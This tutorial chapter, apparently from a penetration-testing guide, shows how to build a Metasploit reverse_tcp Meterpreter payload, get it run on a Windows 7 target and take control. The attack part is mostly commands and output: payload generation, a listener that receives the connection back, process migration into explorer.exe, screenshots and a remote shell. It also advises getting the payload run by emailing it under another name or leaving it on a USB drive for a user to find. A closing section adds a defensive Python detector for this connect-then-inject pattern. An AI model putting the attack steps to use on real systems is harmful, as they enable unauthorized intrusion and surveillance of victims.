
Chapter 4 - Running an Exploit against a Windows 7 machine.

We are going to use BackTrack 5 and Metasploit to gain access to the Windows 7 VM on our network. The Metasploit Framework includes a tool called Meterpreter, and this is the tool we are going to use to gain access to our Windows 7 VM. To get started, here is the definition of Meterpreter from the official PDF, for those who do not know what it is:

    "Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred."

As we are running this attack on a LAN, the attacking machine's IP address is used as LHOST (local host) and the port it listens on as LPORT (local port). Start BackTrack and open a new terminal window. Enter the following command:

    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Payload1.exe

It may take a minute to create. Finally you will see the following output:

    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
     Length: 290
    Options: LHOST=192.168.1.4, LPORT=4444
    root@bt:~#

The file Payload1.exe is now located in /root. Select Places > Computer to browse for the file.

Select Root and the file should be in the right window. Copy the file to a USB drive.

The file Payload1.exe needs to be executed on the target PC. This may involve emailing the file (with a different name) or leaving it on a USB drive and letting a user "find" the drive.

Open a new terminal window and start Metasploit. We now need to start the handler (exploit/multi/handler) that will receive the connection back from the payload. Type the following into the new terminal window, pressing Enter after each command:

    root@bt:~# msfconsole
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) >

Next we need to modify some options. Enter the following to set the IP address and port number of the attacking PC:

    msf exploit(handler) > set LHOST 192.168.1.4
    LHOST => 192.168.1.4
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444

Finally, type "exploit" to start the handler:

    msf exploit(handler) > exploit

    [*] Started reverse handler on 192.168.1.4:4444
    [*] Starting the payload handler...

The handler will now wait until the Payload1.exe file is run on the target. Once it has been executed, you will see output confirming that a Meterpreter session has opened.

The target system is now open and we can begin to look around. We are going to migrate into explorer.exe on the target PC next. Type ps to list the target's running processes.

Look through the list to find the PID of explorer.exe:

    1380  explorer.exe  x86  1  SERMERSOOQ\ilin  C:\Windows\Explorer.EXE

Once you have found it, type the following into the terminal:

    meterpreter > migrate 1380
    [*] Migrating to 1380...
    [*] Migration completed successfully.
    meterpreter >

We can now access further information on the target PC. The sysinfo command details the target's OS:

    meterpreter > sysinfo
    Computer: NUUMOB0088
    OS      : Windows 7 (Build 7600, ).
    Arch    : x86
    Language: da_DK
    meterpreter >

To take a screenshot of the target's desktop:

    meterpreter > screenshot

To open a command prompt:

    meterpreter > shell

We can now access the target's file system. Type the following:

    cd..
    cd..
    mkdir c:\hacked

Open the target VM and browse the hard drive; you should see the newly created folder on the C: drive.
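The sequence this chapter walks through leaves a recognisable trace on the Windows side: an executable run from a USB drive opens a connection back to the handler's LHOST:LPORT, and the migrate step then creates a thread inside explorer.exe. The following Python script is an added example, not code from this chapter or from the Metasploit project. It correlates constructed Sysmon-style event lines (Event ID 3 is NetworkConnect, Event ID 8 is CreateRemoteThread) by process ID and flags any process that connected out and afterwards created a thread in another process. The key=value log layout, the timestamps, the browser and EDR paths and the PIDs other than 1380 are invented for the example; 192.168.1.4:4444 and Explorer.EXE PID 1380 mirror the lab above.

```python
"""Correlate Sysmon-style events to flag the 'connect back, then migrate' pattern.

Added example for this chapter (not Metasploit or chapter code). Sysmon Event ID 3
is NetworkConnect and Event ID 8 is CreateRemoteThread; the key=value rendering
below is a simplification chosen for the example, not Sysmon's real event layout.
"""
from collections import defaultdict

# Constructed sample telemetry. Timestamps, the browser/EDR paths and PIDs 2212,
# 3040 and 900 are invented; 192.168.1.4:4444 and Explorer.EXE PID 1380 mirror the lab.
SAMPLE_LOG = r"""
EventID=1|UtcTime=2011-09-01 10:00:01|ProcessId=2212|Image=C:\Program Files\Browser\browser.exe|ParentImage=C:\Windows\explorer.exe
EventID=3|UtcTime=2011-09-01 10:00:05|ProcessId=2212|Image=C:\Program Files\Browser\browser.exe|DestinationIp=203.0.113.10|DestinationPort=443
EventID=1|UtcTime=2011-09-01 10:02:10|ProcessId=3040|Image=E:\Payload1.exe|ParentImage=C:\Windows\explorer.exe
EventID=3|UtcTime=2011-09-01 10:02:11|ProcessId=3040|Image=E:\Payload1.exe|DestinationIp=192.168.1.4|DestinationPort=4444
EventID=8|UtcTime=2011-09-01 10:03:30|SourceProcessId=3040|SourceImage=E:\Payload1.exe|TargetProcessId=1380|TargetImage=C:\Windows\Explorer.EXE
EventID=8|UtcTime=2011-09-01 10:04:00|SourceProcessId=900|SourceImage=C:\Program Files\EDR\sensor.exe|TargetProcessId=1380|TargetImage=C:\Windows\Explorer.EXE
"""


def parse_line(line):
    """Parse one 'key=value|key=value' record into a dict."""
    record = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        record[key] = value
    return record


def detect_connect_then_inject(lines):
    """Return findings for processes that opened an outbound connection and
    afterwards created a thread in another process.

    Correlation is by ProcessId only; a production rule would key on Sysmon's
    ProcessGuid so that PID reuse cannot join unrelated events.
    """
    events = [parse_line(line) for line in lines if line.strip()]

    # pid -> list of (time, ip, port) for every outbound connection seen
    connections = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == "3":
            connections[ev["ProcessId"]].append(
                (ev["UtcTime"], ev["DestinationIp"], int(ev["DestinationPort"]))
            )

    findings = []
    for ev in events:
        if ev.get("EventID") != "8":
            continue
        pid = ev["SourceProcessId"]
        # Only connections made before the remote thread count. The UtcTime
        # format sorts lexicographically, so plain string comparison is enough.
        prior = [(ip, port) for (t, ip, port) in connections.get(pid, [])
                 if t <= ev["UtcTime"]]
        if prior:
            findings.append({
                "pid": pid,
                "image": ev["SourceImage"],
                "target_pid": ev["TargetProcessId"],
                "target_image": ev["TargetImage"],
                "remote_endpoints": prior,
            })
    return findings


def run_detection():
    """Run the rule over the constructed sample and return the findings."""
    return detect_connect_then_inject(SAMPLE_LOG.strip().splitlines())


if __name__ == "__main__":
    for hit in run_detection():
        print(f"ALERT pid={hit['pid']} {hit['image']} connected to "
              f"{hit['remote_endpoints']} then injected into "
              f"{hit['target_image']} (pid {hit['target_pid']})")
```

The rule deliberately does not key on port 4444: LPORT is set freely in the handler, as the set LPORT step above shows, so a port-based signature is trivial to sidestep, whereas the behaviour (outbound connection followed by a remote thread from the same process) is what the migrate step requires. The browser line shows a connection with no injection and the EDR line an injection with no connection, and neither is flagged; the cmd.exe spawned by the shell command is not used as a signal because users launch command prompts from explorer.exe all the time.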
